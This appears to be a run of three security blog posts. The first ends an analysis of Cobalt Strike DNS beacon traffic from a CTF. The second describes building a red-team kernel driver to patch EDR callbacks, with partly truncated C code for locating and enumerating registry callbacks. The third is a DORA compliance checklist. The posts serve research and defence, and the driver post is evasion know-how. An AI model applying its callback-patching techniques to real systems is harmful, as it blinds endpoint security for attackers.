At regular intervals (determined by the sleep settings), the beacon issues an A record DNS query for name 19997cf2[.]wallet[.]thedarkestside[.]org. wallet[.]thedarkestside[.]org are the root labels of every query that this beacon will issue, and this is set inside the config. 19997cf2 is the hexadecimal representation of the beacon ID (bid) of this particular beacon instance. Each running beacon generates a 32-bit number, that is used to identify the beacon with the team server. It is different for each running beacon, even when the same beacon executable is started several times. All DNS request for this particular beacon, will have root labels 19997cf2[.]wallet[.]thedarkestside[.]org.

To determine the purpose of a set of DNS queries like above, we need to consult the configuration of the beacon:

Figure 5: zooming in on the DNS settings of the configuration of this beacon (Figure 1)

The following settings define the top label per type of query:

  1. DNS_beacon
  2. DNS_A
  4. DNS_TXT
  5. DNS_metadata
  6. DNS_output

Notice that the values seen in figure 5 for these settings, are the default Cobalt Strike profile settings.

For example, if DNS queries issued by this beacon have a name starting with http://www., then we know that these are queries to send the metadata to the team server.

In the configuration of our beacon, the value of DNS_beacon is (NULL …): that’s an empty string, and it means that no label is put in front of the root labels. Thus, with this, we know that queries with name 19997cf2[.]wallet[.]thedarkestside[.]org are DNS_beacon queries. DNS_beacon queries is what a beacon uses to inquire if the team server has tasks for the beacon in its queue. The reply to this A record DNS query is an IPv4 address, and that address instructs the beacon what to do. To understand what the instruction is, we first need to XOR this replied address with the value of setting DNS_Idle. In our beacon, that DNS_Idle value is (the default DNS_Idle value is

Looking at figure 4, we see that the replies to the first requests are These have to be XORed with DNS_Idle value thus the result is A reply equal to means that there are no tasks inside the team server queue for this beacon, and that it should sleep and check again later. So for the first 5 queries in figure 4, the beacon has to do nothing.

That changes with the 6th query: the reply is IPv4 address, and when we XOR that value with, we end up with Value instructs the beacon to check for tasks using TXT record queries.

Here are the possible values that determine how a beacon should interact with the team server:

Figure 6: possible DNS_Beacon replies

If the least significant bit is set, the beacon should do a checkin (with a DNS_metadata query).

If bits 4 to 2 are cleared, communication should be done with A records.

If bit 2 is set, communication should be done with TXT records.

And if bit 3 is set, communication should be done with AAAA records.

Value 242 is 11110010, thus no checkin has to be performed but tasks should be retrieved via TXT records.

The next set of DNS queries are performed by the beacon because of the instructions ( it received:

Figure 7: DNS_TXT queries

Notice that the names in these queries start with api., thus they are DNS_TXT queries, according to the configuration (see figure 5). And that is per the instruction of the team server (

Although DNS_TXT queries should use TXT records, the very first DNS query of a DNS_TXT query is an A record query. The reply, an IPv4 address, has to be XORed with the DNS_Idle value. So here in our example, XORed with gives This specifies the length (64 bytes) of the encrypted data that will be transmitted over TXT records. Notice that for DNS_A and DNS_AAAA queries, the first query will be an A record query too. It also encodes the length of the encrypted data to be received.

Next the beacon issues as many TXT record queries as necessary. The value of each TXT record is a BASE64 string, that has to be concatenated together before decoding. The beacon stops issuing TXT record requests once the decoded data has reached the length specified in the A record reply (64 bytes in our example).

Since the beacon can issue these TXT record queries very quickly (depending on the sleep settings), a mechanism is introduced to avoid that cached DNS results can interfere in the communication. This is done by making each name in the DNS queries unique. This is done with an extra hexadecimal label.

Notice that there is an hexadecimal label between the top label (api in our example) and the root labels (19997cf2[.]wallet[.]thedarkestside[.]org in our example). That hexadecimal label is 07311917 for the first DNS query and 17311917 for the second DNS query. That hexadecimal label consists of a counter and a random number: COUNTER + RANDOMNUMBER.

In our example, the random number is 7311917, and the counter always starts with 0 and increments with 1. That is how each query is made unique, and it also helps to process the replies in the correct order, in case the DNS replies arrive in disorder.

Thus, when all the DNS TXT replies have been received (there is only one in our example), the base 64 string (ZUZBozZmBi10KvISBcqS0nxp32b7h6WxUBw4n70cOLP13eN7PgcnUVOWdO+tDCbeElzdrp0b0N5DIEhB7eQ9Yg== in our example) is decoded and decrypted (we will do this with a tool at the end of this blog post).

This is how DNS beacons receive their instructions (tasks) from the team server. The encrypted bytes are transmitted via DNS A, DNS AAAA or DNS TXT record replies.

When the communication has to be done over DNS A records ( reply), the traffic looks like this:

Figure 8: DNS_A queries

cdn. is the top label for DNS_A requests (see config figure 5).

The first reply is, XORed with, this gives Thus 112 bytes of encrypted data have to be received.: that’s 112 / 4 = 28 DNS A record replies.

The encrypted data is just taken from the IPv4 addresses in the DNS A record replies. In our example, that’s: 19, 64, 240, 89, 241, 225, …

And for DNS_AAAA queries, the method is exactly the same, except that the top label is www6. in our example (see config figure 5) and that each IPv6 address contains 16 bytes of encrypted data.

The encrypted data transmitted via DNS records from the team server to the beacon (e.g., the tasks) has exactly the same format as the encrypted tasks transmitted with http or https. Thus the decryption process is exactly the same.

When the beacon has to transmit its results (output of the tasks) to the team server, is uses DNS_output queries. In our example, these queries start with top label post. Here is an example:

Figure 9: beacon sending results to the team server with DNS_output queries

Each name of a DNS query for a DNS_output query, has a unique hexadecimal counter, just like DNS_A, DNS_AAAA and DNS_TXT queries. The data to be transmitted, is encoded with hexadecimal digits in labels that are added to the name.

Let’s take the first DNS query (figure 9): post.140.09842910.19997cf2[.]wallet[.]

This name breaks down into the following labels:

  • post: DNS_output query
  • 140: transmitted data
  • 09842910: counter + random number
  • 19997cf2: beacon ID
  • wallet[.] domain chosen by the operator

The transmitted data of the first query is actually the length of the encrypted data to be transmitted. It has to be decoded as follows: 140 -> 1 40.

The first hexadecimal digit (1 in our example) is a counter that specifies the number of labels that are used to contain the hexadecimal data. Since a DNS label is limited to 63 characters, more than one label needs to be used when 32 bytes or more need to be encoded. That explains the use of a counter. 40 is the hexadecimal data, thus the length of the encrypted data is 64 bytes long.

The second DNS query (figure 9) is: post.2942880f933a45cf2d048b0c14917493df0cd10a0de26ea103d0eb1b3.4adf28c63a97deb5cbe4e20b26902d1ef427957323967835f7d18a42.19842910.19997cf2[.]wallet[.]thedarkestside[.]org.

The name in this query contains the encrypted data (partially) encoded with hexadecimal digits inside labels.

These are the transmitted data labels: 2942880f933a45cf2d048b0c14917493df0cd10a0de26ea103d0eb1b3.4adf28c63a97deb5cbe4e20b26902d1ef427957323967835f7d18a42

The first digit, 2, indicates that 2 labels were used to encode the encrypted data: 942880f933a45cf2d048b0c14917493df0cd10a0de26ea103d0eb1b3 and 4adf28c63a97deb5cbe4e20b26902d1ef427957323967835f7d18a42.

The third DNS query (figure 9) is: post.1debfa06ab4786477.29842910.19997cf2[.]wallet[.]thedarkestside[.]org.

The counter for the labels is 1, and the transmitted data is debfa06ab4786477.

Putting all these labels together in the right order, gives the following hexadecimal data:

942880f933a45cf2d048b0c14917493df0cd10a0de26ea103d0eb1b34adf28c63a97deb5cbe4e20b26902d1ef427957323967835f7d18a42debfa06ab4786477. That’s 128 hexadecimal digits long, or 64 bytes, exactly like specified by the length (40 hexadecimal) in the first query.

The hexadecimal data above, is the encrypted data transmitted via DNS records from the beacon to the team server (e.g., the task results or output) and it has almost the same format as the encrypted output transmitted with http or https. The difference is the following: with http or https traffic, the format starts with an unencrypted size field (size of the encrypted data). That size field is not present in the format of the DNS_output data.


We have developed a tool, cs-parse-traffic, that can decrypt and parse DNS traffic and HTTP(S). Similar to what we did with encrypted HTTP traffic, we will decode encrypted data from DNS queries, use it to find cryptographic keys inside the beacon’s process memory, and then decrypt the DNS traffic.

First we run the tool with an unknown key (-k unknown) to extract the encrypted data from the DNS queries and replies in the capture file:

Figure 10: extracting encrypted data from DNS queries

Option -f dns is required to process DNS traffic, and option -i is used to provided the DNS_Idle value. This value is needed to properly decode DNS replies (it is not needed for DNS queries).

The encrypted data (red rectangle) can then be used to find the AES and HMAC keys inside the process memory dump of the running beacon:

Figure 11: extracting cryptographic keys from process memory

That key can then be used to decrypt the DNS traffic:

Figure 12: decrypting DNS traffic

This traffic was used in a CTF challenge of the Cyber Security Rumble 2021. To find the flag, grep for CSR in the decrypted traffic:

Figure 13: finding the flag inside the decrypted traffic


The major difference between DNS Cobalt Strike traffic and HTTP Cobalt Strike traffic, is how the encrypted data is encoded. Once encrypted data is recovered, decrypting it is very similar for DNS and HTTP.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

Kernel Karnage – Part 5 (I/O & Callbacks)

By: bautersj
30 November 2021 at 10:02

After showing interceptor’s options, it’s time to continue coding! On the menu are registry callbacks, doubly linked lists and a struggle with I/O in native C.

1. Interceptor 2.0

Until now, I relied on the Evil driver to patch kernel callbacks while I attempted to tackle $vendor2, however the Evil driver only implements patching for process and thread callbacks. This week I spent a good amount of time porting over the functionality from Evil driver to Interceptor and added support for patching image load callbacks as well as a first effort at enumerating registry callbacks.

While I was working, I stumbled upon Mimidrv In Depth: Exploring Mimikatz’s Kernel Driver by Matt Hand, an excellent blogpost which aims to clarify the inner workings of Mimikatz’ kernel driver. Looking at the Mimikatz kernel driver code made me realize I’m a terrible C/C++ developer and I wish drivers were written in C# instead, but it also gave me an insight into handling different aspects of the interaction process between the kernel driver and the user mode application.

To make up for my sins, I refactored a lot of my code to use a more modular approach and keep the actual driver code clean and limited to driver-specific functionality. For those interested, the architecture of Interceptor looks somewhat like this:

+-- Driver
|   +-- Header Files
    |   +-- Common.h                | contains structs and IOCTLs shared between the driver and CLI
    |   +-- Globals.h               | contains global variables used in all modules
    |   +-- pch.h                   | precompiled header
    |   +-- Interceptor.h           | function prototypes
    |   +-- Intercept.h             | function prototypes
    |   +-- Callbacks.h             | function prototypes
    +-- Source Files
    |   +-- pch.cpp
    |   +-- Interceptor.cpp         | driver code
    |   +-- Intercept.cpp           | IRP hooking module
    |   +-- Callbacks.cpp           | Callback patching module
+-- CLI
|   +-- Source Files
    |   +-- InterceptorCLI.cpp

2. Driver I/O and why it’s a mess

Something else that needs overhauling is the way the driver handles I/O from the user mode application. When the user mode application requests a listing of all the present drivers on the system, or the registered callbacks, a lot of data needs to be collected and sent back in an efficient and structured manner. I’m not particularly fussy about speed or memory usage, but I would like to keep the code tidy, easy to read and understand, and keep the risk of dangling pointers and memory leaks at a minimum.

Drivers typically handle I/O via 3 different ways:

  1. Using the IRP_MJ_READ dispatch routine with ReadFile()
  2. Using the IRP_MJ_WRITE dispatch routine with WriteFile()
  3. Using the IRP_MJ_DEVICE_CONTROL dispatch routine with DeviceIoControl()

Using 3 different methods:

  1. Buffered I/O
  2. Direct I/O
  3. On a IOCTL basis

Since Interceptor returns different data depending on the request (IRP) it received, the I/O is handled in the IRP_MJ_DEVICE_CONTROL dispatch routine on a IOCTL basis using METHOD_BUFFERED. As discussed in Part 2, an IRP is accompanied by one or more IO_STACK_LOCATION structures which we can retrieve using IoGetCurrentIrpStackLocation(). The current stack location is important, because it contains several fields with information regarding user buffers.

When using METHOD_BUFFERED, the I/O Manager will assist us with managing resources. When the request comes in, the I/O manager will allocate the system buffer from non-paged pool memory (non-paged pool memory is always present in RAM) with a size that is the maximum of the lengths of the input and output buffers and then copy the user input buffer to the system buffer. When the request is complete, the I/O manager copies the specified number of bytes from the system buffer to the user output buffer.

PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(Irp);
//size of user input buffer
size_t szBufferIn = stack->Parameters.DeviceIoControl.InputBufferLength;
//size of user output buffer
size_t szBufferOut = stack->Parameters.DeviceIoControl.OutputBufferLength;
//system buffer used for both reading and writing
PVOID bufferInOut = Irp->AssociatedIrp.SystemBuffer;

Using buffered I/O has a drawback, namely we need to define common I/O structures for use in both driver and user mode application, so we know what input, output and size to expect. As an example, we will pass an index and driver name from our user mode application to our driver:

    char driverName[256];
    int index;

DWORD lpBytesReturned;
data.index = 1;
data.driverName = "\\Driver\\MyDriver";
DeviceIoControl(hDevice, IOCTL_MYDRIVER_GET_DRIVER_INFO, &inputBuffer, sizeof(inputBuffer), nullptr, 0, &lpBytesReturned, nullptr);

auto data = (USER_DRIVER_DATA*)Irp->AssociatedIrp.SystemBuffer;
int index = data->index;
char driverName[256];
strcpy_s(driverName, data->driverName);

Using this approach, we quickly end up with a lot of different structures in Common.h for each of the different I/O requests, so I went looking for a “better”, more generic way of handling I/O. I decided to look at the Mimikatz kernel driver code again for inspiration. The Mimikatz driver uses METHOD_NEITHER, combined with a custom buffer and a wrapper around the RtlStringCbPrintfExW() function.

When using METHOD_NEITHER, the I/O Manager is not involved and it is up to the driver itself to manage the user buffers. The input and output buffer are no longer copied to and from the system buffer.

PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(Irp);
//using input buffer
PVOID bufferIn = stack->Parameters.DeviceIoControl.Type3InputBuffer;
//user output buffer
PVOID bufferOut = Irp->UserBuffer;

The idea behind the Mimikatz approach is to declare a single buffer structure and a wrapper kprintf() around RtlStringCbPrintfExW():

typedef struct _MY_BUFFER {
    size_t* szBuffer;
    PWSTR* Buffer;

#define kprintf(MyBuffer, Format, ...) (RtlStringCbPrintfExW(*(MyBuffer)->Buffer, *(MyBuffer)->szBuffer, (MyBuffer)->Buffer, (MyBuffer)->szBuffer, STRSAFE_NO_TRUNCATION, Format, __VA_ARGS__))

The kprintf() wrapper accepts a pointer to our buffer structure MY_BUFFER, a format string and multiple arguments to be used with the format string. Using the provided format string, it will write a byte-counted, null-terminated text string to the supplied buffer *(MyBuffer)->Buffer.

Using this approach, we can dynamically allocate our user output buffer using bufferOut = LocalAlloc(LPTR, szBufferOut), this will allocate the specified number of bytes (szBufferOut) as fixed memory memory on the heap and initialize it to zero (LPTR (0x0040) flag = LMEM_FIXED (0x0000) + LMEM_ZEROINIT (0x0040) flags).

We can then write to this output buffer in our driver using the kprintf() wrapper:

MY_BUFFER kOutputBuffer = { &szBufferOut, (PWSTR*)&bufferOut };
szBufferOut = stack->Parameters.DeviceIoControl.OutputBufferLength;
bufferOut = Irp->UserBuffer;
szBufferIn = stack->Parameters.DeviceIoControl.InputBufferLength;
bufferIn = stack->Parameters.DeviceIoControl.Type3InputBuffer;

kprintf(&kOutputBuffer, L"Input: %s\nOutput: %s\n", bufferIn, L"our output");
ULONG_PTR information = stack->Parameters.DeviceIoControl.OutputBufferLength - szBufferOut;

return CompleteIrp(Irp, status, information);

If the output buffer appears too small for all the data we wish to write, kprintf() will return STATUS_BUFFER_OVERFLOW. Because the STRSAFE_NO_TRUNCATION flag is set in RtlStringCbPrintfExW(), the contents of the output buffer will not be modified, so we can increase the size, reallocate the output buffer on the heap and try again.

3. Recalling the callbacks

As mentioned in previous blogposts, locating the different callback arrays and implementing a function to patch them was fairly straightforward. Apart from process and thread callbacks, I also added in the PsLoadImageNotifyRoutineEx() callback, which alerts a driver whenever a new image is loaded or mapped into memory.

Registry and Object creation/duplication callbacks work slightly different when it comes to how the callback function addresses are stored. Instead of a callback array containing function pointers, the function pointers for registry and object callbacks are stored in a doubly linked list. This means that instead of looking for a callback array address, we’ll be looking for the address of the CallbackListHead.


Instead of going the same route as with obtaining the address for the callback arrays by enumerating the instructions in the NotifyRoutine() functions looking for a series of opcodes, I decided to instead enumerate the CmUnRegisterCallback() function, which is used to remove a registry callback. The reason behind this approach is that in order to obtain the CallbackListHead address via CmRegisterCallback(), we need to follow 2 jumps (0xE8) to CmpRegisterCallbackInternal() and CmpInsertCallbackInListByAltitude(). Instead, by using CmUnRegisterCallback(), we only need to look for a LEA, RCX (0x48 0x8d 0x0d) instruction which puts the address of the CallbackListHead into RCX.

ULONG64 FindCmUnregisterCallbackCallbackListHead() {
	RtlInitUnicodeString(&func, L"CmUnRegisterCallback");

	ULONG64 funcAddr = (ULONG64)MmGetSystemRoutineAddress(&func);

	ULONG64 OffsetAddr = 0;
	for (ULONG64 instructionAddr = funcAddr; instructionAddr < funcAddr + 0xff; instructionAddr++) {
		if (*(PUCHAR)instructionAddr == OPCODE_LEA_RCX_7[g_WindowsIndex] &&
			*(PUCHAR)(instructionAddr + 1) == OPCODE_LEA_RCX_8[g_WindowsIndex] &&
			*(PUCHAR)(instructionAddr + 2) == OPCODE_LEA_RCX_9[g_WindowsIndex]) {

			OffsetAddr = 0;
			memcpy(&OffsetAddr, (PUCHAR)(instructionAddr + 3), 4);
			return OffsetAddr + 7 + instructionAddr;
	return 0;

Once we have the CallbackListHead address, we can use it to enumerate the doubly linked list and retrieve the callback function pointers. The structure we’re working with can be defined as:

typedef struct _CMREG_CALLBACK {
    LIST_ENTRY List;
    ULONG Unknown1;
    ULONG Unknown2;
    PVOID Unknown3;

The registered callback function pointer is located at offset 0x28.

PVOID* CallbackListHead = (PVOID*)FindCmUnregisterCallbackCallbackListHead();
ULONG64 i;

if (CallbackListHead) {
    for (pEntry = (PLIST_ENTRY)*CallbackListHead, i = 0; NT_SUCCESS(status) && (pEntry != (PLIST_ENTRY)CallbackListHead); pEntry = (PLIST_ENTRY)(pEntry->Flink), i++) {
        ULONG64 callbackFuncAddr = *(ULONG64*)((ULONG_PTR)pEntry + 0x028);
        KdPrint((DRIVER_PREFIX "[%02llu] 0x%llx\n", i, callbackFuncAddr));

4. Conclusion

In this blogpost we took a brief look at the structure of the Interceptor kernel driver and how we can handle I/O between the kernel driver and user mode application without the need to create a crazy amount of structures. We then ventured back into callback land and took a peek at obtaining the CallbackListHead address of the doubly linked list containing registered registry callback function pointers (try saying that quickly 5 times in a row 😉 ).

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

DORA and ICT Risk Management: how to self-assess your compliance

By: nicoameye
2 December 2021 at 10:09

TL;DR – In this blogpost, we will give you an introduction to the key requirements associated with the Risk Management Framework introduced by DORA (Digital Operational Resilience Act); 

More specifically, throughout this blogpost we will try to formulate an answer to following questions:

  • What are the key requirements associated with the Risk Management Framework of DORA?
  • What are the biggest challenges associated with these requirements?
  • How can you prepare yourself and what are the actions that you should took in aligning your organization to the Risk Management Framework requirements?

In the following sections, we will share our thoughts on how to self-assess your compliance on this requirement. Note also that, if this self-assessment checklist is of interest to you, you will be able to find it in an excel format in our GitHub repository, here.  

What are the ICT Risk Management requirements?

DORA requires organizations to apply a strong risk-based approach in their digital operational resilience efforts. This approach is reflected in Chapter 2 of the regulation.

Chapter 2 – Section 1 – Risk management governance

The first part of Chapter 2 addresses the risk management governance requirements. They include, but are not limited to, setting roles and responsibilities of the management body, planning and periodic auditing.

This section states the responsibilities of the management body for the definition, approval, overseeing of all arrangements related to the ICT risk management framework.

This section also states the definition and attribution of the role of ICT third party Officer. This position shall be in charge of defining and monitoring all the arrangements concluded with ICT third-party service providers on the use of ICT services.

The following table provides a checklist for financial entities to self-assess their compliance on this requirement:

Article 4 Governance and organisation
Responsibilities of the management body The management body shall define, approve, oversee and be accountable for the implementation of all arrangements related to the ICT risk management framework.
ICT third party Officer The role of ICT third party Officer shall be defined to monitor the arrangements concluded with ICT third-party service providers on the use of ICT services 
Training of the management body The management body shall, on a regular basis, follow specific trainings related to ICT risks and their impact on the operations 

Chapter 2 – Section 2 – Risk management framework

The second part of Chapter 2 introduces the ICT risk management framework itself as a critical component of the regulation.

ICT risk management requirements form a set of key principles revolving around specific functions (identification, protection and prevention, detection, response and recovery, learning and evolving and communication). Most of them are recognized by current technical standards and industry best practices, such as the NIST framework, and thus the DORA does not impose specific standardization itself.

Before exploring the functions, let’s note that DORA specifies several governance mechanisms around the risk management framework. They include, but are not limited to, setting the objectives of the risk management framework, planning and periodic auditing.

The following table provides a checklist for financial entities to self-assess their compliance on these governance requirement:

Article 5 ICT risk management framework
Protecting physical elements Entities shall define a well-documented ICT risk management framework which shall include strategies, policies, procedures, ICT protocols and tools which are necessary to protect all relevant physical components and infrastructures
Information on ICT risks Entities shall minimise the impact of ICT risk by deploying appropriate strategies, policies, procedures, protocols and tools
ISMS Entities shall implement an information security management system based on recognized international standards
Three lines of defence  Entities shall ensure appropriate segregation of ICT management functions, control functions, and internal audit functions
Review The ICT risk management framework shall be reviewed at least once a year, as well as upon the occurrence of major ICT-related incidents
Improvement The ICT risk management framework shall be continuously improved on the basis of lessons derived from implementation and monitoring
Audit The ICT risk management framework shall be audited on a regular basis by ICT auditors 
Remediation Entities shall define a formal follow-up process for the timely verification and remediation of critical ICT audit findings
ICT risk management framework objectives The ICT risk management framework shall include the methods to address ICT risk and attain specific ICT objectives


Financial entities shall identify and classify the ICT-related business functions, information assets and supporting ICT resources based on which risks posed by current cyber threats and ICT vulnerabilities are identified and assessed.

The following table provides a checklist for financial entities to self-assess their compliance on the Identification requirement:

Article 7 Identification 
Asset Identification Entities shall identify and adequately document:
(a) ICT-related business functions
(b) Information assets supporting these functions
(c) ICT system configurations and interconnections with internal and external ICT systems
Asset Classification  Entities shall classify and adequately document:
(a) ICT-related business functions
(b) Information assets supporting these functions
(c) ICT system configurations and interconnections with internal and external ICT systems
Asset Classification Review  Entities shall review as needed, and at least yearly, the adequacy of the classification of the information assets 
ICT risks Identification and Assessment  Entities shall identify all sources of ICT risks, and assess cyber threats and ICT vulnerabilities relevant to their ICT-related business functions and information assets. 
ICT risks Identification and Assessment Review Entities shall regularly review the ICT risks Identification and Assessment yearly or upon each major change in the network and information system infrastructure
ICT mapping Entities shall identify all ICT systems accounts, the network resources and hardware equipment
(a) Entities shall map physical equipment considered critical
(b) Entities shall map the configuration of the ICT assets and the links and interdependencies between the different ICT assets. 
 ICT third-party service providers identification Entities shall identify all ICT third-party service providers
(a) Entities shall identify and document all processes that are dependent on ICT third-party service providers
(b) Entities shall identify interconnections with ICT third-party service providers.
 ICT third-party service providers identification review Entities shall regularly review the  ICT third-party service providers identification
Legacy ICT systems Entities shall on a regular basis, and at least yearly, conduct a specific ICT risk assessment on all legacy ICT systems

This ICT risk management framework shall include the identification of critical and important functions as well as the mapping of the ICT assets that underpin them. Moreover, this ICT risk management framework shall also include the assessment of all risks associated with the ICT-related business functions and information assets identified.

What to identify and assess? Well …

  • ICT-related business functions
  • Supporting information assets supporting these functions
  • ICT system configurations
  • Interconnections with internal and external systems
  • Sources of ICT risk
  • All ICT system accounts
  • Network resources and hardware equipment
  • Critical physical equipment
  • All processes dependent on and interconnections with ICT third-party service providers

Protection and Prevention

Financial entities shall (based on the risk assessment) set up protection and prevention measures to ensure the resilience, continuity and availability of ICT systems. These shall include ICT  security  strategies, policies,  procedures and appropriate technologies.

The following table provides a checklist for financial entities to self-assess their compliance on this requirement:

Article 8 Protection and Prevention 
CIA Entities shall develop and document an information security policy defining rules to protect the confidentiality, integrity and availability of theirs, and their customers’ ICT resources, data and information assets; 
Segmentation Entities shall establish a sound network and infrastructure management using appropriate techniques, methods and protocols including implementing automated mechanisms to isolate affected information assets in case of cyber-attacks
Access privileges Entities shall implement policies that limit the physical and virtual access to ICT system resources and data and establish to that effect a set of policies, procedures and controls that address access privileges
Authentication mechanisms Entities shall implement policies and protocols for strong authentication mechanisms and dedicated controls systems to prevent access to cryptographic keys 
ICT change management  Entities shall implement policies, procedures and controls for ICT change management including changes to software, hardware, firmware components, system or security changes. The ICT change management process shall be approved by appropriate lines of management and shall have specific protocols enabled for emergency changes. 
Patching Entities shall have appropriate and comprehensive policies for patches and updates

What does this entail?

  • Ensuring the resilience, continuity and availability of ICT systems
  • Ensuring the security, confidentiality and integrity of data
  • Ensuring the continuous monitoring and control of ICT systems and tools
  • Defining and implementing Information security policies such as
    • Limit physical and virtual access to ICT systems
    • Protocols on strong authentication
    • Change management
    • Patching / updates management


Financial entities shall continuously monitor and promptly detect anomalous activities, threats and compromises of the ICT environment.

The following table provides a checklist for financial entities to self-assess their compliance on this requirement:

Article 9 Detection 
Detect anomalous activities Entities shall have in place mechanisms to promptly detect anomalous activities
(a) ICT network performance issues
(b) ICT-related incidents
Detect single points of failure Entities shall have in place mechanisms to identify all potential material single points of failure
Testing All detection mechanisms shall be regularly tested 
Alert mechanism All detection mechanisms shall enable multiple layers of control
(a) Define alert thresholds
(b) Define criteria to trigger ICT-related incident detection
(c) Define criteria to trigger ICT-related incident response processes
(d) Have automatic alert mechanisms in place for relevant staff in charge of ICT-related incident response. 
Trade reports checking Entities shall have in place systems that can effectively check trade reports for completeness, identify omissions and obvious errors and request re-transmission of any such erroneous reports. 

What does this entail?

  • Ensure the prompt detection of anomalous activities
  • Enforce multiple layers of control
  • Enable the identification of single points of failure

Response and recovery (including Backup policies and recovery methods)

Financial entities shall put in place dedicated and comprehensive business continuity policies and disaster and recovery plans to adequately react to identified security incidents and to ensure the resilience, continuity and availability of ICT systems.

The following table provides a checklist for financial entities to self-assess their compliance on Response and recovery requirements:

Article 10 Response and recovery 
ICT Business Continuity Policy  Entities shall put in place a dedicated and comprehensive ICT Business Continuity Policy as an integral part of the operational business continuity policy  of the entity
ICT Business Continuity Mechanisms Entities shall implement the ICT Business Continuity Policy through appropriate and documented arrangements, plans, procedures and mechanisms aimed at:
(a) recording all ICT-related incidents ;
(b) ensuring the continuity of the entity’s critical functions;
(c) quickly, appropriately and effectively responding to and resolving all ICT-related incidents
(d) activating without delay dedicated plans that enable containment measures, processes and technologies, as well as tailored response and recovery procedures 
(e) estimating preliminary impacts, damages and losses;
(f) setting out communication and crisis management actions which ensure that updated information is transmitted to all relevant internal staff and external stakeholders, and reported to competent authorities 
ICT Disaster Recovery Plan Entities shall implement an associated ICT Disaster Recovery Plan
ICT Disaster Recovery Audit Review Entities shall define a process for the ICT Disaster Recovery Plan to be subject to independent audit reviews.  
ICT Business Continuity Test  Entities shall periodically test the ICT Business Continuity Policy, at least yearly and after substantive changes to the ICT systems;
ICT Disaster Recovery Test Entities shall periodically test the ICT Disaster Recovery Plan, at least yearly and after substantive changes to the ICT systems;
Testing Plans Entities shall include in the testing plans scenarios of cyber-attacks and switchovers between the primary ICT infrastructure and the redundant capacity, backups and redundant facilities 
Crisis Communication Plans Entities shall implement a crisis communication plan
Crisis Communication Plans Test Entities shall periodically test the crisis communication plans, at least yearly and after substantive changes to the ICT systems;
Crisis Management Function Entities shall have a crisis management function, which, in case of activation of their ICT Business Continuity Policy or ICT Disaster Recovery Plan, shall set out clear procedures to manage internal and external crisis communications 
Records of Activities Entities shall keep records of activities before and during disruption events when their ICT Business Continuity Policy or ICT Disaster Recovery Plan is activated. 
ICT Business Continuity Policy Communication When implementing changes to the ICT Business Continuity Policy, entities shall communicate those changes to the competent authorities
Test Communication Entities shall define a process to provide to the competent authorities copies of the results of the ICT business continuity tests
Incident Communication Entities shall define a process to report to competent authorities all costs and losses caused by ICT disruptions and ICT-related incidents

The following table provides a checklist for financial entities to self-assess their compliance on Backup policies requirements:

Article 11 Backup policies and recovery methods 
Backup Policy Entities shall develop a backup policy
(a) specifying the scope of the data that is subject to the backup
(b) specifying the minimum frequency of the backup
(c) based on the criticality of information or the sensitiveness of the data
Backup Restoration When restoring backup data using own systems, entities shall use ICT systems that have an operating environment different from the main one, that is not directly connected with the latter and that is securely protected from any unauthorized access or ICT corruption
Recovery Plans Entities shall develop a recovery plans which enable the recovery of all transactions at the time of disruption to allow the central counterparty to continue to operate with certainty and to complete settlement on the scheduled date
Recovery Methods Entities shall develop recovery methods to limit downtime and limited disruption
ICT third-party providers Continuity Entities shall ensure that their ICT third-party providers maintain at least one secondary processing site endowed with resources, capabilities, functionalities and staffing arrangements sufficient and appropriate to ensure business needs
ICT third-party providers secondary processing site Entities shall ensure that the ICT third-party provider secondary processing site is:
(a) located at a geographical distance from the primary processing site
(b) capable of ensuring the continuity of critical services identically to the primary site
(c) immediately accessible to the entity’s staff to ensure continuity of critical services 
Recovery time objectives Entities shall determine recovery time and point objectives for each function. Such time objectives shall ensure that, in extreme scenarios, the agreed service levels are met
Recovery checks When recovering from an ICT-related incident, entities shall perform multiple checks, including reconciliations, in order to ensure that the level of data integrity is of the highest level

How to meet the compliance on the Response and Recovery requirements?

  • Define and implement an ICT Business Continuity Policy
  • Define and implement an ICT Disaster Recovery Plans
  • Define and implement an Back-up policies
  • Develop recovery methods
  • Determine flexible recovery time and point objectives for each function

Developing response and recovery strategies and plans adds an additional level of complexity, as it will require financial entities to think carefully about substitutability, including investing in backup and restoration systems, as well as assess whether – and how – certain critical functions can operate through alternative systems or methods of delivery while primary systems are checked and brought back up.

Learning and evolving

Financial entities shall include continuous learning and evolving in the internal processes in the form of information-gathering, as well as post-incident review and analysis.

The following table provides a checklist for financial entities to self-assess their compliance on this requirement:

Article 12 Learning and evolving 
Risk landscape Entities shall gather information on vulnerabilities and cyber threats, ICT-related incidents, in particular cyber-attacks, and analyse their likely impacts on their digital operational resilience.
Post ICT-related incident reviews  Entities shall put in place post ICT-related incident reviews after significant ICT disruptions of their core activities
(a) analysing the causes of disruption
(b) identifying required improvements to the ICT operations or within the ICT Business Continuity Policy  
Post ICT-related incident reviews mechanism Entities shall ensure the post ICT-related incident reviews determines whether the established procedures were followed and the actions taken were effective
(a) the promptness in responding to security alerts and determining the impact of ICT-related incidents and their severity;
(b) the quality and speed in performing forensic analysis;
(c) the effectiveness of incident escalation within the financial entity;
(d) the effectiveness of internal and external communication 
Lessons learned from the ICT Business Continuity and ICT Disaster Recovery tests Entities shall derive lessons from the ICT Business Continuity and ICT Disaster Recovery tests. Lessons shall be duly incorporated on a continuous basis into the ICT risk assessment process
Lessons learned reporting Senior ICT staff shall report at least yearly to the management body on the findings derived from the lessons learned from the ICT Business Continuity and ICT Disaster Recovery tests
Monitor the effectiveness of the implementation of the digital resilience strategy Entities shall map the evolution of ICT risks over time, analyse the frequency, types, magnitude and evolution of ICT-related incidents, in particular cyber-attacks and their patterns, with a view to understand the level of ICT risk exposure and enhance the cyber maturity and preparedness of the entity
ICT security awareness programs  Entities shall develop ICT security awareness trainings as compulsory modules in their staff training schemes
Digital operational resilience training Entities shall develop ICT digital operational resilience trainings as compulsory modules in their staff training schemes 

What does this entail?

  • Ensure information gathering on vulnerabilities and cyber threats
  • Ensure post-incident reviews after significant ICT disruptions
